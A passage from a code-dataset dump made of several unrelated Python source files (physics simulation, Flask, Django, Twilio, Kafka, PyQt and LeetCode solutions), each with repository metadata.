- omegas[2] - omegas[1] - omegas[0] - sp.I*relax_gamma[n, m]) \\\n *(omega_matrix[v, m] - omegas[2] - omegas[1] - sp.I*relax_gamma[v, m]) \\\n *(omega_matrix[v, l] - omegas[2] - sp.I*relax_gamma[v, l]))\n \n c = (density_matrix[v, v] - density_matrix[l, l]) \\\n *(dipole[k][m, n]*dipole[xyz[1]][v, m]*dipole[xyz[0]][n, l]*dipole[xyz[2]][l, v]) \\\n /((omega_matrix[n, m] - omegas[2] - omegas[1] - omegas[0] - sp.I*relax_gamma[n, m]) \\\n *(omega_matrix[n, v] - omegas[2] - omegas[1] - sp.I*relax_gamma[n, v]) \\\n *(omega_matrix[l, v] - omegas[2] - sp.I*relax_gamma[l, v]))\n \n d = (density_matrix[l, l] - density_matrix[n, n]) \\\n *(dipole[k][m, n]*dipole[xyz[1]][v, m]*dipole[xyz[0]][l, v]*dipole[xyz[2]][n, l]) \\\n /((omega_matrix[n, m] - omegas[2] - omegas[1] - omegas[0] - sp.I*relax_gamma[n, m]) \\\n *(omega_matrix[n, v] - omegas[2] - omegas[1] - sp.I*relax_gamma[n, v]) \\\n *(omega_matrix[n, l] - omegas[2] - sp.I*relax_gamma[n, l]))\n chi3_temp += a - b - c + d\n return sp.simplify(chi3_temp)\n \n simultaneous_permutations = list(itertools.permutations(zip(cartiesian_indices, lights_omegas)))\n numb_aves = len(simultaneous_permutations)\n for current_xyzs_omegas in simultaneous_permutations:\n current_xyzs = [xyz_omega[0] for xyz_omega in current_xyzs_omegas]\n current_omegas = [xyz_omega[1] for xyz_omega in current_xyzs_omegas]\n chi3_kijk += chi_3_no_permuations(current_xyzs, current_omegas, numb_of_states)/numb_aves\n return sp.simplify(chi3_kijk)\n\ndef hydrogen_basis(max_n):\n \"\"\"\n n\n l = [0,n-1]\n m = [-l, l]\n \"\"\"\n basis = []\n for n in range(1, max_n + 1):\n for l in range(0, n):\n for m in range(-l, l + 1):\n basis.append((n, l, m))\n return basis\n\ndef pickle_matrices(object_to_pickle, file_path):\n \"\"\"\n Uses the Pickle module to save computationally expensive matrices to a given\n file path\n \"\"\"\n with open(file_path, 'wb') as f:\n pickle.dump(object_to_pickle, f)\n \ndef unpickle_matrices(file_path):\n \"\"\"\n Uses the Pickle module to save computationally expensive matrices to a given\n file path\n \"\"\"\n with open(file_path, 'rb') as f:\n dipole, omega, decay = pickle.load(f)\n return dipole, omega, decay\n\ndef perturb_density(rho_init, mu, omega, decay, efield_pump, time_var, t_finals, hbar = 1):\n \"\"\"\n Uses the density matrix formulation of first order perturbation theory with\n damping to calculate the density matrix after some time (t) in atomic units\n (boyd 2nd ed eq 3.5.1 pg 161 [pg 173 pdf])\n \n Parameters\n ----------\n rho_init: n by n sympy matrix \n mu: list of three n by n sympy matrices\n omega: n by n sympy matrix \n decay: n by n sympy matrix \n efield_pump: list of three sympy functions\n time: float\n hbar: 1 in atomic units\n \n Notes\n -----\n integration starts at t = 0\n \"\"\"\n size_row, size_col = rho_init.shape\n rho_final = sp.zeros(size_row, size_col)\n V = sp.zeros(size_row, size_col)\n t_prime = sp.symbols(\"t_prime\")\n t = time_var\n #print(\"E_field = {0}\\nDipole = {1}\".format(efield_pump, mu))\n for element in [efield_pump[axis]*mu[axis] for axis in range(len(mu))]:\n V += element\n print(\"Dipole Potential = {}\".format(V))\n commute = ((V*rho_init - rho_init*V)*(-sp.I/hbar)).subs({t: t_prime})\n print(\"[V, rho_init] = {}\".format(commute))\n \n final_rhos = []\n for t_final in t_finals:\n for r in range(size_row): \n for c in range(size_col):\n exp_factor_integral = sp.exp((sp.I*omega[r, c] + decay[r, c])*t_prime)\n exp_factor = sp.exp((-sp.I*omega[r, c] + decay[r, c])*t)\n integrand = commute[r, 
c]*exp_factor_integral\n try:\n integral = sp.integrate(integrand, (t_prime, 0, t_final), risch=False)\n except Exception as e:\n print(\"integrand = {}\".format(integrand))\n print(\"row = {0}, col = {1}\".format(r, c))\n raise(e)\n rho_final[r, c] = integral*exp_factor.subs({t: t_final}) + rho_init[r, c]\n final_rhos.append(rho_final)\n print(\"computed perturbed rho for t_final = {}\".format(t_final))\n print(\"perturbed rho\\n-------------\\n{}\".format(rho_final))\n \n return final_rhos\n \n\ndef main():\n \"\"\"\n for calculating estimates for the relaxation matrix consider using these eqs\n https://en.wikipedia.org/wiki/Spontaneous_emission#Rate_of_spontaneous_emission\n \"\"\"\n chi3_conversion_factor = constants.physical_constants[\"atomic unit of 2nd hyperpolarizability\"][0]\n basis = hydrogen_basis(2)\n pickled_output_file = \"pickled_dipole_freq_decay_with_{}_basis_functions_{}.pickle\".format(len(basis), strftime(\"%H-%M-%S\"))\n \n omw = (E_nl(2) - E_nl(1))/8 # driving and probing light freq\n density_0 = sp.zeros(len(basis), len(basis))\n density_0[0, 0] = 1\n \n #make pump field\n #see https://en.wikipedia.org/wiki/Gaussian_function\n # I = 0.5*c*n*epsilon_0*|E|**2\n # |E| = sqrt(2*I/c*n*epsilon_0)\n time = sp.symbols(\"time\")\n time_conversion = constants.physical_constants['atomic unit of time'][0]/constants.femto\n efield_conversion = constants.physical_constants[\"atomic unit of electric field\"][0]\n t_0 = 200/time_conversion #fs\n FWHM_duration = 100/time_conversion #fs\n intensity = 2*10**20 #W/cm**2\n n = 1\n E_mag = np.sqrt(2*(intensity*10**4)/(constants.c*n*constants.epsilon_0))/efield_conversion\n E_x = 0\n E_y = 0\n E_z = E_mag*sp.exp((-4*np.log(2)*(time - t_0)**2)/(FWHM_duration**2))\n E_field = [E_x, E_y, E_z]\n \n print(\"hydrogen basis set = {}\".format(basis))\n print(\"Initial density matrix\")\n sp.pprint(density_0)\n print(\"computing hydrogen\\'s dipole matrix\")\n mu = hydrogen_dipole_matrix(basis)\n print(\"computing hydrogen\\'s frequency matrix\")\n omega = hydrogen_omega_matrix(basis)\n print(\"estimating hydrogen\\'s decay rate matrix\")\n gamma = decay_rate_estimates(omega, mu)\n \n save_data_dict = {\"mu\": mu, \"omega\": omega,\"decay\": gamma}\n \n time_steps = np.linspace(0, 1000, 6) #fs\n print(\"time steps = {} fs\".format(time_steps))\n \n save_data_dict[\"time_steps_fs\"] = time_steps\n \n perturbed_rhos = perturb_density(density_0, mu, omega, gamma, E_field, time, time_steps/time_conversion)\n save_data_dict[\"perturbed_rhos\"] = perturbed_rhos\n print(\"perturbed_rhos = {}\".format(perturbed_rhos))\n\n print(\"computing chi3_yxxy and chi3_yxyx\")\n chi3_yxxy = np.array([chi_3(1, 0, 0, 1, omw, omw, omw, mu, gamma, rho, omega) for rho in perturbed_rhos])\n save_data_dict[\"chi3_yxxy_au\"] = chi3_yxxy\n print(\"chi3_yxxy = {} a.u.\".format(chi3_yxxy))\n chi3_yxyx = np.array([chi_3(1, 0, 1, 0, omw, omw, omw, mu, gamma, rho, omega) for rho in perturbed_rhos])\n save_data_dict[\"chi3_yxyx_au\"] = chi3_yxyx\n print(\"chi3_yxyx = {} a.u.\".format(chi3_yxyx))\n chi3_eff = chi3_yxxy + chi3_yxyx\n save_data_dict[\"chi3_eff_SI\"] = chi3_eff*chi3_conversion_factor\n print(\"chi3_eff = {} m^2/V^2\".format(chi3_eff*chi3_conversion_factor))\n print(\"|chi3_eff|^2 = {} SI\".format(abs(chi3_eff*chi3_conversion_factor)**2))\n \n pickle_matrices(save_data_dict, pickled_output_file)\n \n\nif __name__ == \"__main__\":\n 
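main() above pickles the expensive sympy results (mu, omega, gamma and the perturbed density matrices) so they only need to be computed once. A minimal sketch of reloading such a run for further analysis, assuming a dict written by pickle_matrices with the keys used in main(); the file name below is hypothetical:

import pickle

def load_saved_run(file_path):
    # Load the dict written by pickle_matrices(save_data_dict, file_path)
    with open(file_path, 'rb') as f:
        return pickle.load(f)

saved = load_saved_run("pickled_dipole_freq_decay_with_4_basis_functions_12-00-00.pickle")
print(saved["time_steps_fs"])  # sampled times in femtoseconds
print(saved["chi3_eff_SI"])    # effective chi3 in SI units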
main()\n","repo_name":"zifn/Hydrogen","sub_path":"hydrogen.py","file_name":"hydrogen.py","file_ext":"py","file_size_in_byte":13590,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22936038400","text":"import os\n\nfrom flask import Flask\nimport flaskr.Server\n\"\"\"\n There is a problem here!\n config.py\n\"\"\"\ndef create_app(test_config=None):\n app=Flask(__name__,instance_relative_config=True)\n # __name__ is the name of the current module\n app.config.from_mapping(SECRET_KEY='dev',DATABASE=os.path.join(app.instance_path,'flaskr.db'),)\n # app.config.from_mapping() sets the app's default configuration\n if test_config is None:\n app.config.from_pyfile('config.py',silent=True)\n else:\n app.config.from_mapping(test_config)\n\n\n try:\n os.makedirs(app.instance_path)\n except OSError:\n pass\n from . import auth\n app.register_blueprint(auth.bp)\n\n @app.route('/')\n def hello():\n return \"Hello,MY name is BuBu!\"\n return app\n\n\nif __name__ == '__main__':\n create_app().run()\n","repo_name":"LiuGuangbu/Pairr","sub_path":"PairrService/flaskr/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":804,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"25201518680","text":"'''\nn = 1 0, 1\nn = 2 -> 00 01 11 10\nn = 3 -> 110 111 101 100\nn = 4 -> \n'''\nclass Solution:\n def grayCode(self, n: int) -> List[int]:\n output = [0,1]\n for _ in range(1,n):\n b = len(output)\n c = 2**_\n for __ in reversed(range(b)):\n output.append(c + output[__])\n return output\n \n \n ","repo_name":"Atul-Verma-Git/100-days-of-code","sub_path":"gray-code/gray-code.py","file_name":"gray-code.py","file_ext":"py","file_size_in_byte":376,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"34640561966","text":"# https://leetcode.com/problems/can-place-flowers/\n# Straightforward idea: check whether each 0 is a valid spot, set that position to 1, then decrement n; return True once n reaches 0\n# But the many edge cases would make that code bloated\nfrom typing import List\n\nclass Solution:\n def canPlaceFlowers(self, flowerbed: List[int], n: int) -> bool:\n tmp = [0] + flowerbed + [0]\n index = 1\n while index < len(tmp) - 1:\n if tmp[index-1] == 0 and tmp[index] == 0 and tmp[index+1] == 0:\n n -= 1\n if n <= 0:\n return True\n index += 1\n index += 1\n return n <= 0\n \n","repo_name":"ZhangYet/vanguard","sub_path":"myrtle/date0310/can_place_flower.py","file_name":"can_place_flower.py","file_ext":"py","file_size_in_byte":693,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"74604662508","text":"import logging\nimport random\n\nfrom twilio.rest import Client\n\nfrom common.CommonResultCode import CommonResultCode\nfrom common.Json import Json\nfrom common.MonterException import MonterException\nfrom common.const import ConstTwilio\nfrom common.response_handler import ResponseHandler\n\nlogging.basicConfig(level=logging.INFO)\nlogger = logging.getLogger('api')\n\nclient = Client(ConstTwilio.ACCOUNT_SID, ConstTwilio.AUTH_TOKEN)\n\n\n@ResponseHandler.api\ndef lambda_handler(event, context):\n phone_no = get_body_contents(event)\n\n code = make_random_4_digits()\n message = ConstTwilio.MESSAGE_FORMAT.format(code=code)\n\n phone_no = f\"+82{phone_no}\"\n twilio_response = send_twilio_sms(phone_no, message)\n\n if twilio_response.get('statusCode', 400) != 200:\n raise MonterException(CommonResultCode.TWILIO_SEND_SMS_ERROR, None, twilio_response['errorMessage'])\n\n return { 'code': code }\n\n\ndef get_body_contents(event) -> str:\n body_dict = 
Json.to_dict(event['body'])\n\n if 'phoneNo' not in body_dict:\n raise MonterException(CommonResultCode.INVALID_BODY_CONTENTS, None, '휴대폰 번호가 없습니다')\n\n return body_dict['phoneNo']\n\n\ndef make_random_4_digits() -> int:\n return random.randint(1000, 9999)\n\n\ndef send_twilio_sms(to, contents):\n message = client.messages.create(\n from_=ConstTwilio.FROM,\n body=contents,\n to=to\n )\n\n status_code = 200 if message.error_code is None else message.error_code\n return {\n 'statusCode': status_code,\n 'errorMessage': message.error_message,\n 'message.sid': message.sid\n }\n","repo_name":"0woodev/monter.api","sub_path":"d_auth/v1_auth_sms_code_post/v1_auth_sms_code_post.py","file_name":"v1_auth_sms_code_post.py","file_ext":"py","file_size_in_byte":1606,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"74132867627","text":"from django.shortcuts import render, redirect, get_object_or_404\nfrom .models import Service, UserRentService, ReturnRequest\nfrom .forms import RentServiceForm, SaleServiceForm, RentForm, ServiceSearchForm\nfrom django.views.decorators.csrf import csrf_exempt\nimport datetime\nfrom datetime import date\nfrom django.contrib.auth.decorators import login_required\n\n@login_required\ndef services_list(request):\n form = ServiceSearchForm(request.GET)\n services = Service.objects.all()\n\n if form.is_valid():\n if form.cleaned_data['search_category']:\n services = services.filter(category=form.cleaned_data['search_category'])\n\n return render(request, 'servicesApp/services_list.html', {'services': services, 'form': form})\n\n@login_required\ndef service_detail(request, pk):\n service = Service.objects.get(pk=pk)\n template_name = 'servicesApp/rent_detail.html' if service.type == Service.RENT else 'servicesApp/sale_detail.html'\n return render(request, template_name, {'service': service})\n\n@login_required\ndef create_rent_service(request):\n form = RentServiceForm(request.POST or None)\n if form.is_valid():\n service = form.save(commit=False)\n service.type = Service.RENT\n service.save()\n return redirect('servicesApp:service_detail', pk=service.pk)\n return render(request, 'servicesApp/create_service.html', {'form': form})\n\n@login_required\ndef create_sale_service(request):\n form = SaleServiceForm(request.POST or None)\n if form.is_valid():\n service = form.save(commit=False)\n service.type = Service.SALE\n service.save()\n return redirect('servicesApp:service_detail', pk=service.pk)\n return render(request, 'servicesApp/create_service.html', {'form': form})\n\n@login_required\n@csrf_exempt\ndef rent_service(request, pk):\n service = get_object_or_404(Service, pk=pk)\n user = request.user\n\n if request.method == 'POST':\n form = RentForm(request.POST)\n if form.is_valid():\n user_rent_service = form.save(commit=False)\n user_rent_service.service = service\n user_rent_service.user = user.username\n days = (user_rent_service.end_date - user_rent_service.start_date).days\n user_rent_service.total_price = days * service.price\n user_rent_service.save()\n service.stock -= 1\n service.save()\n return redirect('servicesApp:service_detail', pk=service.pk)\n else:\n start_date = datetime.date.today()\n end_date = start_date + datetime.timedelta(days=7)\n form = RentForm(initial={'start_date': start_date, 'end_date': end_date})\n\n return render(request, 'servicesApp/rent_form.html', {'service': service, 'form': form})\n\n@login_required\ndef rented_services(request):\n today = date.today()\n 
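Because random.randint is inclusive on both ends, the 4-digit code range above is easy to get wrong. A quick property check for the helper, standard library only (a sketch, not part of the original Lambda):

import random

def make_random_4_digits() -> int:
    # randint is inclusive on both ends, so 9999 is the correct upper bound
    return random.randint(1000, 9999)

# every draw should be exactly four digits
for _ in range(10000):
    assert 1000 <= make_random_4_digits() <= 9999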
rented_services = UserRentService.objects.filter(returned=False, end_date__gte=today)\n return render(request, 'servicesApp/rented_services.html', {'rented_services': rented_services})\n\n@login_required\ndef rented_service_detail(request, pk):\n rented_service = get_object_or_404(UserRentService, pk=pk)\n return render(request, 'servicesApp/rented_service_detail.html', {'rented_service': rented_service})\n\n@login_required\ndef return_service(request, pk):\n rented_service = get_object_or_404(UserRentService, pk=pk)\n ReturnRequest.objects.create(rented_service=rented_service)\n return redirect('servicesApp:rented_services')\n\n@login_required\ndef admin_return_requests(request):\n if not request.user.is_staff:\n return redirect('servicesApp:services_list')\n return_requests = ReturnRequest.objects.filter(approved=None)\n return render(request, 'servicesApp/admin_return_requests.html', {'return_requests': return_requests})\n\n@login_required\ndef approve_return_request(request, pk):\n if not request.user.is_staff:\n return redirect('servicesApp:services_list')\n return_request = get_object_or_404(ReturnRequest, pk=pk)\n rented_service = return_request.rented_service\n rented_service.returned = True\n rented_service.service.stock += 1\n rented_service.service.save()\n return_request.approved = True\n return_request.save()\n rented_service.delete() \n return redirect('servicesApp:admin_return_requests')\n\n@login_required\ndef deny_return_request(request, pk):\n if not request.user.is_staff:\n return redirect('servicesApp:services_list')\n return_request = get_object_or_404(ReturnRequest, pk=pk)\n return_request.approved = False\n return_request.save()\n return redirect('servicesApp:admin_return_requests')\n\n@login_required\n@csrf_exempt\ndef sale_service(request, pk):\n service = get_object_or_404(Service, pk=pk)\n if service.stock > 0:\n service.stock -= 1\n service.save()\n return redirect('servicesApp:service_detail', pk=service.pk)\n","repo_name":"Lukas0818/ptua-project","sub_path":"website/servicesApp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4876,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36667159547","text":"if __name__ == \"__main__\":\n f = open(\"./input.txt\", \"r\")\n input_strings = f.read().splitlines()\n input_lists = [string.replace(\":\", \"\").replace(\"-\", \" \").split(\" \") for string in input_strings]\n input_dicts = [{\n \"min_occurrences\": int(l[0]),\n \"max_occurrences\": int(l[1]),\n \"letter\": l[2],\n \"pwd\": l[3],\n } for l in input_lists]\n\n num_valid = 0\n for d in input_dicts:\n num_occurrences = d[\"pwd\"].count(d[\"letter\"])\n if (num_occurrences <= d[\"max_occurrences\"]) and (num_occurrences >= d[\"min_occurrences\"]):\n num_valid += 1\n\n print(num_valid)\n","repo_name":"mattwedge/AdventOfCode","sub_path":"2020/day2/part1.py","file_name":"part1.py","file_ext":"py","file_size_in_byte":621,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"25409743666","text":"import requests\r\nfrom bs4 import BeautifulSoup\r\n\r\nfrom logger import logger\r\n\r\n\r\nclass SingleProjectGitUrlExtractor:\r\n\r\n @staticmethod\r\n def extract(soup):\r\n if not soup:\r\n return\r\n\r\n logger.info('Looking for project children (GIT)')\r\n code_urls = set()\r\n for li in soup.find_all('ul', {'class': 'dropdown'})[0]('li'):\r\n try:\r\n a = li('a')[0]\r\n if a('span')[0].text.startswith('Git'):\r\n href_link = 
a['href']\r\n if href_link.startswith('/p'):\r\n url = f'https://sourceforge.net/{href_link[1:]}'\r\n\r\n logger.info(f'Found project GIT children on {url}, scrapping')\r\n response = requests.get(url)\r\n soup = BeautifulSoup(response.text, 'html.parser')\r\n\r\n for link in soup.find_all('div', {'class': 'list card'}):\r\n cleaned_link = link('a')[0]['href']\r\n if cleaned_link.startswith('/p'):\r\n code_urls.add(cleaned_link[1:])\r\n except:\r\n pass\r\n\r\n if code_urls:\r\n logger.info(f'Found project GIT children: {code_urls}')\r\n return code_urls\r\n","repo_name":"Software-Engineering-Jagiellonian/russell-indexer-sourceforge","sub_path":"frege-indexer-sourceforge/single_project_git_url_extractor.py","file_name":"single_project_git_url_extractor.py","file_ext":"py","file_size_in_byte":1302,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"37420418661","text":"from PyQt6.QtWidgets import QApplication, QMainWindow\nfrom PyQt6 import QtCore\n\nfrom utils.Log import Log\nfrom utils.AppConfig import AppConfig\nfrom utils.Managers import CreateManagers\n\nfrom view.EntityFileView import EntityFileView\nfrom view.EntityLogicsView import EntityLogicsView\nfrom view.EntityTreeView import EntityTreeView\nfrom view.base.MainDockWidget import WrapMainDockWidget\nfrom view.EngineOutputView import EngineOutputView\n\nfrom native.EditorNative import EditorNative\n\nfrom model.AssetsModel import AssetsModel\nfrom model.LogicsModel import LogicsModel\nfrom model.SoundEventsModel import SoundEventsModel\n\nfrom menu.MainFileMenu import MainFileMenu\nfrom menu.MainToolBar import MainToolBar\nfrom menu.MainViewMenu import MainViewMenu\n\nfrom view.main.StatusBar import StatusBar\n\nimport sys\nimport os\n\nclass EditorView(QMainWindow):\n def __init__(self):\n super().__init__()\n\n self.setWindowTitle(\"Editor\")\n self.setMinimumSize(640, 480)\n self.setContentsMargins(1, 1, 1, 1)\n\n self._fileMenu = MainFileMenu(self)\n self._viewMenu = MainViewMenu(self)\n\n self.menuBar().addMenu(self._fileMenu)\n self.menuBar().addMenu(self._viewMenu)\n\n self.addToolBar(MainToolBar())\n self.setStatusBar(StatusBar())\n\n self._engineOutputView = EngineOutputView()\n self.setCentralWidget(self._engineOutputView)\n\n if not self._init():\n sys.exit(1)\n\n CreateManagers(self)\n\n self._openEntityTreeView()\n self._openFileTreeView()\n self._openEntityLogicsView()\n\n def _openEntityTreeView(self):\n self._entityTreeView = EntityTreeView()\n self.addDockWidget(QtCore.Qt.DockWidgetArea.LeftDockWidgetArea, WrapMainDockWidget(self._entityTreeView, \"Entity Tree\"))\n\n def _openFileTreeView(self):\n self._entityFileView = EntityFileView()\n self._entityFileView.setFileTreeModel(self._assetsModel.getEntitiesTree())\n self.addDockWidget(QtCore.Qt.DockWidgetArea.LeftDockWidgetArea, WrapMainDockWidget(self._entityFileView, \"Assets Explorer\"))\n\n def _openEntityLogicsView(self):\n self._entityLogicsView = EntityLogicsView()\n self.addDockWidget(QtCore.Qt.DockWidgetArea.RightDockWidgetArea, WrapMainDockWidget(self._entityLogicsView, \"Entity Logics\"))\n\n def closeEvent(self, event):\n self._deinit()\n return super().closeEvent(event)\n\n def __del__(self):\n self._deinit()\n\n def _init(self):\n self._appConfig = AppConfig()\n self._editorNative = EditorNative(self._appConfig)\n if not self._editorNative.init():\n self._editorNative = None\n Log.error(\"[EditorView:_init] Can't init native editor\")\n return False\n self._assetsModel = 
AssetsModel(self._appConfig)\n if not self._assetsModel.init():\n Log.error(\"[EditorView:_init] Can't init assets model\")\n return False\n self._logicsModel = LogicsModel(self._editorNative)\n if not self._logicsModel.init():\n Log.error(\"[EditorView:_init] Can't init logics model\")\n return False\n self._soundEventsModel = SoundEventsModel(self._appConfig)\n if not self._soundEventsModel.init():\n Log.error(\"[EditorView:_init] Can't init sound events model\")\n return False\n return True\n\n def _deinit(self):\n if self._editorNative is not None:\n self._editorNative.deinit()\n self._editorNative = None\n\ndef main():\n app = QApplication([])\n app.setStyle(\"windows\")\n editor = EditorView()\n editor.show()\n sys.exit(app.exec())\n\nif __name__ == \"__main__\":\n main()","repo_name":"lastcolour/GamePractice","sub_path":"Sources/Editor/App/Editor.py","file_name":"Editor.py","file_ext":"py","file_size_in_byte":3689,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"37"} +{"seq_id":"36814065826","text":"import time\nimport redis\nfrom flask import Flask\n\napp = Flask(__name__)\ncache = redis.Redis(host='redis', port=6379)\n\ndef get_hit_count():\n retries = 5\n while True:\n try:\n #cache.reset_retry_count()\n return cache.incr('hits')\n except redis.exceptions.ConnectionError as exc:\n if retries == 0:\n raise exc\n retries -= 1\n time.sleep(0.5)\n\n@app.route('/')\ndef hello():\n count = get_hit_count()\n return 'Hello Etixi! I have been seen {} times.\\n'.format(count)\n\n#### docker compose\n# docker images\n# docker compose up\n# docker compose down\n# docker compose stop\n# docker rm -f image_id\n# docker images","repo_name":"Etixi/MLOPS_Tools_Step_By_Step","sub_path":"Model_Server_And_Application/Docker_Project/DockerCompose/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":692,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"34854443955","text":"#User function Template for python3\n\nfrom typing import List\n\nclass Solution: \n def eventualSafeNodes(self, V : int, adj : List[List[int]]) -> List[int]:\n # code here\n def dfscheck(node,graph,vis,pathvis,check):\n vis[node]=1\n pathvis[node]=1\n check[node]=0\n for i in graph[node]:\n if not vis[i]:\n if dfscheck(i,graph,vis,pathvis,check)==True:\n check[node]=0\n return True\n elif pathvis[i]:\n check[node]=0\n return True\n check[node]=1\n pathvis[node]=0\n return False\n n=V\n vis=[0]*n\n pathvis=[0]*n\n check=[0]*n\n for i in range(n):\n if not vis[i]:\n dfscheck(i,adj,vis,pathvis,check)\n safenodes=[]\n for i in range(n):\n if check[i]==1:\n safenodes.append(i)\n return safenodes\n \n\n\n#{ \n # Driver Code Starts\n#Initial Template for Python 3\n\nif __name__==\"__main__\":\n T = int(input())\n for t in range(T):\n \n V, E = map(int, input().strip().split())\n adj = [[] for i in range(V)]\n for i in range(E):\n u, v = map(int, input().strip().split())\n adj[u].append(v)\n obj = Solution()\n ans = obj.eventualSafeNodes(V, adj)\n for nodes in ans:\n print(nodes, end = ' ')\n print()\n \n\n\n# } Driver Code Ends","repo_name":"Durgaprasad-kakarla/Geeks-for-Geeks","sub_path":"Medium/Eventual Safe States/eventual-safe-states.py","file_name":"eventual-safe-states.py","file_ext":"py","file_size_in_byte":1542,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"20972628924","text":"from kafka import KafkaProducer\nfrom time import sleep\nimport json\nfrom 
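get_hit_count above retries a fixed number of times with a constant half-second sleep. The same idea as a reusable helper with exponential backoff; standard library only, and the names and limits here are illustrative rather than part of the original app:

import time

def retry(fn, attempts=5, base_delay=0.5, exc=Exception):
    # call fn(), sleeping base_delay * 2**attempt between failed attempts
    for attempt in range(attempts):
        try:
            return fn()
        except exc:
            if attempt == attempts - 1:
                raise
            time.sleep(base_delay * 2 ** attempt)

# usage sketch: retry(lambda: cache.incr('hits'), exc=redis.exceptions.ConnectionError)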
datetime import datetime\n\nproducer = KafkaProducer(\n bootstrap_servers=['localhost:9092'], api_version=(0, 10, 1))\nproducer.send('tunnel1', json.dumps(\n 'Starting the message queue').encode('utf-8'))\n\nnow = datetime.now()\n\ncurrent_time = now.strftime(\"%d/%m/%Y %H:%M:%S\")\n\nfor i in range(10):\n message = \"Message {}\".format(str(datetime.now().time()))\n producer.send('tunnel1', json.dumps(message).encode('utf-8'))\n sleep(2)\n print(\"Message sent \", i+1)\n","repo_name":"LINSANITY03/MessageKafkaPython","sub_path":"messageProducer.py","file_name":"messageProducer.py","file_ext":"py","file_size_in_byte":544,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"7834669020","text":"# 60. Permutation Sequence QuestionEditorial Solution My Submissions\n# Total Accepted: 68146\n# Total Submissions: 255846\n# Difficulty: Medium\n# Contributors: Admin\n# \n# By listing and labeling all of the permutations in order,\n# We get the following sequence (ie, for n = 3):\n# \n# \"123\"\n# \"132\"\n# \"213\"\n# \"231\"\n# \"312\"\n# \"321\"\n# Given n and k, return the kth permutation sequence.\n# \n# Note: Given n will be between 1 and 9 inclusive.\n# \n# Subscribe to see which companies asked this question\n\n# 11.27.2016 Rewrite\n# Bug notes: \n# 1. import math for factorial. otherwise write a function\n# 2. k = (k - 1) % tmp + 1\nimport math\nclass Solution(object):\n def getPermutation(self, n, k):\n \"\"\"\n :type n: int\n :type k: int\n :rtype: str\n \"\"\"\n if n <= 0 or k <= 0: return \"\"\n \n res = \"\"\n nums = [ x for x in xrange(1, n+1) ]\n \n while n > 1:\n tmp = math.factorial(n-1) # 2 \n i, k = (k - 1) // tmp, (k - 1) % tmp + 1 # k = (k - 1) % tmp + 1 bug\n res += str(nums[i])\n del nums[i]\n n -= 1\n \n return res + str(nums[0])\n\n\n\n\n\n\n\n\n\n\n\n# Sol 2 TLE\nclass Solution2(object):\n count = 0\n res = \"\"\n resFound = False\n \n def getPermutation(self, n, k):\n \"\"\"\n :type n: int\n :type k: int\n :rtype: str\n \"\"\"\n nums = [ str(x) for x in xrange(1,n+1)]\n self.dfs(\"\", nums, k)\n return self.res\n\n def dfs(self, line, nums, k):\n if self.resFound:\n return \n \n if not nums:\n self.count += 1\n if self.count == k:\n self.res = line\n self.resFound = True\n return \n \n for i in xrange(len(nums)):\n self.dfs(line + nums[i], nums[:i] + nums[i+1:], k)\n\nif __name__ == \"__main__\":\n print(Solution().getPermutation(3, 3))\n print(Solution().getPermutation(4, 14)) #TLE case sol 2\n print(Solution().getPermutation(8, 38790)) #TLE case sol 2\n for x in xrange(1, 16): \n print(Solution2().getPermutation(4, x))\n","repo_name":"yihanc/LC","sub_path":"PY/60_permutation_sequence.py","file_name":"60_permutation_sequence.py","file_ext":"py","file_size_in_byte":2129,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"72799988908","text":"import matplotlib.pyplot as plt\nimport json\nimport numpy as np\n\nFILE = 'transforms_train.json'\n\ndef plot_coordinate_system(ax, point_3d, scale=1):\n ## Coordinate system axis\n ax.quiver(point_3d[0],point_3d[1],point_3d[2], scale, 0, 0, color=\"r\")\n ax.quiver(point_3d[0],point_3d[1],point_3d[2], 0, scale, 0, color=\"g\")\n ax.quiver(point_3d[0],point_3d[1],point_3d[2], 0, 0, scale, color=\"b\")\n\n # axis label placement\n ax.text(point_3d[0]+scale+0.1, point_3d[1], point_3d[2], r'$x$')\n ax.text(point_3d[0], point_3d[1]+scale+0.1, point_3d[2], r'$y$')\n ax.text(point_3d[0], point_3d[1], point_3d[2]+scale+0.1, 
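The factorial-based getPermutation above selects one digit per step instead of enumerating all n! permutations. A Python 3 rewrite cross-checked against itertools for small n (a sketch; the original file is Python 2 and uses xrange):

import math
from itertools import permutations

def get_permutation(n, k):
    # pick each digit by dividing the 1-based rank k into blocks of (n-1)! permutations
    nums = [str(x) for x in range(1, n + 1)]
    res, k = "", k - 1
    while nums:
        i, k = divmod(k, math.factorial(len(nums) - 1))
        res += nums.pop(i)
    return res

for n in range(1, 6):
    expected = ["".join(p) for p in permutations("12345"[:n])]
    assert [get_permutation(n, k) for k in range(1, len(expected) + 1)] == expected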
